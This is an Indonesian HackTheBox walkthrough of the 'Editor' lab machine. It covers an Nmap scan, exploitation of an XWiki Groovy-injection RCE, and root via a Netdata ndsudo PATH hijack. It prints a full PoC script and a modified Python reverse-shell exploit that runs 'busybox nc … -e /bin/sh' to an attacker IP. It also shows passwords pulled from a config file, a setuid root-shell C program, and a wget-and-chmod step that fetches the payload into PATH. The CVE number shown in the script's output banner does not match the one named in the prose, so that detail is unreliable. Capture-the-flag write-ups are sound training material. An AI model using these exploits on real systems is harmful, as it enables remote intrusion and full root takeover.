Selamat datang kembali di walkthrough mesin HackTheBox! Kali ini kita akan menyelesaikan mesin Editor yang memiliki tingkat kesulitan Easy. Mesin ini menyajikan kombinasi menarik antara eksploitasi XWiki dan privilege escalation melalui binary SUID Netdata.
Mari kita mulai dengan port scanning standar menggunakan Nmap untuk mengidentifikasi layanan yang berjalan:
└─# nmap -sCV -A -T5 10.10.11.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-03 02:06 EDT
Warning: 10.10.11.80 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.80
Host is up (0.15s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
8080/tcp open http Jetty 10.0.20
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-open-proxy: Proxy might be redirecting requests
| http-cookie-flags:
| /:
| JSESSIONID:
|_ httponly flag not set
|_http-server-header: Jetty(10.0.20)
| http-methods:
|_ Potentially risky methods: PROPFIND LOCK UNLOCK
| http-webdav-scan:
| Server Type: Jetty(10.0.20)
| WebDAV type: Unknown
|_ Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 73.80 ms 10.10.14.1
2 71.26 ms 10.10.11.80
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.60 seconds
Scan mengungkapkan tiga port yang terbuka:
- Port 8080/tcp: HTTP (Jetty 10.0.20) – Menjalankan XWiki
- Port 22/tcp: SSH (OpenSSH 8.9p1 Ubuntu)
- Port 80/tcp: HTTP (nginx 1.18.0) – Redirect ke
http://editor.htb/
Temuan penting dari scan:
- Web server pada port 80 melakukan redirect ke
editor.htb - Port 8080 menghost instance XWiki dengan robots.txt berisi 50 entri yang dilarang
Analisis Aplikasi Web
Menambahkan Entry Hosts:
Pertama, mari kita tambahkan domain yang ditemukan ke file hosts:
Eksplorasi Website Utama
Mengunjungi http://editor.htb menampilkan halaman download. Di bagian documentation quick links, kita menemukan subdomain: http://wiki.editor.htb/xwiki/
Penemuan XWiki
Mengakses http://editor.htb:8080 mengungkapkan instalasi XWiki yang menjalankan versi 15.10.8. Versi ini rentan terhadap CVE-2024-31982, sebuah vulnerability Remote Code Execution yang kritis.
Detail Vulnerability
CVE-2024-31982 mempengaruhi XWiki Platform dan memungkinkan remote code execution melalui penanganan input pengguna yang tidak tepat dalam fungsi pencarian.
Versi yang Terpengaruh:
- 2.4-milestone-1 hingga sebelum 14.10.20
- 15.0-rc-1 hingga sebelum 15.5.4
- 15.6-rc-1 hingga sebelum 15.10-rc-1
Versi yang Telah Dipatch:
- 14.10.20
- 15.5.4
- 15.10-rc-1
Referensi
Original exploit :
import sys
import requests
import argparse
import re
import urllib3
import urllib.parse
from requests.exceptions import RequestException
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
VULNERABLE_ENDPOINT = "/bin/get/Main/DatabaseSearch?outputSyntax=plain&space=&text="
def extract_description(text):
pattern = r'<description>RSS feed for search on \}\}\}(.*?)</description>'
matches = re.findall(pattern, text, re.DOTALL)
if matches:
return matches[0]
else:
print("No text found in the response.")
return None
def make_request(url):
try:
response = requests.get(url, verify=False, timeout=50) # Skip SSL verification for simplicity
if response.status_code == 200:
return response.text
else:
return None
except RequestException:
return None
def test_host(url, cmd):
try:
groovy_cmd = (
"def sout = new StringBuilder(), serr = new StringBuilder(); "
"def proc = '{cmd}'.execute(); proc.consumeProcessOutput(sout, serr); "
"proc.waitForOrKill(1000); println \"$sout\";".format(cmd=cmd)
)
payload = '}}}{{async async=false}}{{groovy}}' + groovy_cmd + '{{/groovy}}{{/async}}'
encoded_payload = urllib.parse.quote_plus(payload).replace('>','<')
fullurl = f"{url}{VULNERABLE_ENDPOINT}{encoded_payload}"
body = make_request(fullurl)
if body:
extracted_text = extract_description(body)
if extracted_text:
print(extracted_text)
except RequestException:
print(f"Timeout: {url}")
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='POC for CVE-2024-31982: XWiki Platform Remote Code Execution.')
parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., http://target)')
parser.add_argument('-c', '--cmd', required=True, help='Cmd to run')
args = parser.parse_args()
test_host(args.url, args.cmd)kita perlu melakukan sedikit perubahan pada payload tersebut, karena tidak bisa langsung kita gunakan.
Fix reverse shell code :
import requests
from html import unescape
def detect_protocol(domain):
"""Coba koneksi via HTTPS dulu, fallback ke HTTP jika tidak tersedia."""
https_url = f"https://{domain}"
http_url = f"http://{domain}"
try:
response = requests.get(https_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] HTTPS tersedia: {https_url}")
return https_url
except requests.exceptions.RequestException:
print("[!] HTTPS tidak tersedia. Beralih ke HTTP.")
try:
response = requests.get(http_url, timeout=5, allow_redirects=True)
if response.status_code < 400:
print(f"[✔] HTTP tersedia: {http_url}")
return http_url
except requests.exceptions.RequestException:
print("[✖] Tidak dapat mengakses target.")
exit(1)
def send_direct_revshell(target_url, lhost, lport):
"""Kirim reverse shell payload menggunakan Groovy RCE dengan BusyBox."""
print(f"[+] Mengirim direct reverse shell via busybox ke {lhost}:{lport} ...")
cmd = f"busybox nc {lhost} {lport} -e /bin/sh"
encoded_cmd = cmd.replace('"', '\\"')
payload_url = (
f"{target_url}/bin/get/Main/SolrSearch?media=rss&text="
f"%7D%7D%7D%7B%7Basync%20async=false%7D%7D"
f"%7B%7Bgroovy%7D%7D\"{encoded_cmd}\".execute()%7B%7B/groovy%7D%7D"
f"%7B%7B/async%7D%7D"
)
try:
requests.get(payload_url, timeout=5)
except requests.exceptions.RequestException:
pass
if __name__ == "__main__":
print("=" * 80)
print("XWiki CVE-2024-31982 - Direct Reverse Shell via BusyBox")
print("=" * 80)
target = "editor.htb:8080/xwiki"
lhost = "10.10.14.XX" # Ganti dengan IP Anda
lport = "1336"
target_url = detect_protocol(target)
if target_url:
send_direct_revshell(target_url, lhost, lport)
print("[✔] Payload terkirim. Cek listener Anda (nc -lvnp 1336).")kita start listener terlebih dahulu
nc -lvnp 1336lalu kita jalankan exploitnya
└─# python3 ex.py
================================================================================
XWiki CVE-2025-24893 - Direct Reverse Shell via BusyBox
================================================================================
[!] HTTPS not available. Falling back to HTTP.
[✔] HTTP available: http://editor.htb:8080/xwiki
[+] Sending direct reverse shell via busybox to 10.10.14.42:1336 ...
disini kita akan langsung masuk ke shell.
Post-Exploitation & User Flag
Setelah mendapatkan akses awal, saya menjelajahi file konfigurasi XWiki dan menemukan kredensial database di /usr/lib/xwiki/WEB-INF/hibernate.cfg.xml:
cat hibernate.cfg.xml | grep password
<property name="hibernate.connection.password">theEd1t0rTe...</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password">xwiki</property>
<property name="hibernate.connection.password"></property>Ini mengungkapkan password: theEd1t0rTe....
Escalation ke User
disini kita mendapatkan password, yang dimana ini bisa kita gunakan untuk login menggunakan user oliver
cd /home
ls
oliverMenggunakan kredensial yang ditemukan, saya berhasil beralih ke user oliver:
oliver@editor:~$ ls
user.txt
oliver@editor:~$ cat user.txt
710fd4c1d50316e6f919c2737c11d370
oliver@editor:~$ id
uid=1000(oliver) gid=1000(oliver) groups=1000(oliver),999(netdata)Privilege Escalation
Saya mencari binary SUID, dengan fokus pada file terkait Netdata:
find / -perm -4000 -type f 2>/dev/nulloliver@editor:~$ find / -perm -4000 -type f 2>/dev/null
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1Temuan kunci: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo dengan SUID bit yang diset.
Vulnerability Netdata ndsudo
Binary ndsudo rentan terhadap serangan path manipulation. Referensi: GitHub Security Advisory
ls -l /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
disini kita bisa lihat, bahwa SUID bit s disini berarti ketika file tersebut dijalankan, prosesnya akan berjalan dengan izin dari pemilik file, yaitu root, terlepas dari siapapun user yang menjalankannya. https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93
Strategi Eksploitasi
Buat binary berbahaya: Saya membuat program C untuk menjalankan root shell:
// mega.c
#include <unistd.h>
#include <stdlib.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", "-i", NULL);
return 0;
}program c ini akan mengubah id pengguna dan id group dari proses yang sedang berjalan menjadi 0 untuk menjadi root. Setelah itu execl akan mereplace proses yang sedang berjalan dengan program lain, yaitu /bin/bash, dan bash akan dijalankan menggunakan mode interaktif
Compile payload:
└─# gcc mega.c -o mega Setup path manipulation:
mkdir -p ~/fakebin && wget -q http://10.10.xx.xx/mega -O ~/fakebin/megacli && chmod +x ~/fakebin/megacli && export PATH=~/fakebin:$PATH Eksekusi exploit:
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo megacli-disk-infoAkses Root
Exploit berhasil melakukan escalation privilege ke root:
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)
root@editor:/home/oliver# cat /root/root.txt
14ef87795c8cf922a870f9d8b2e28373
wih keren kaka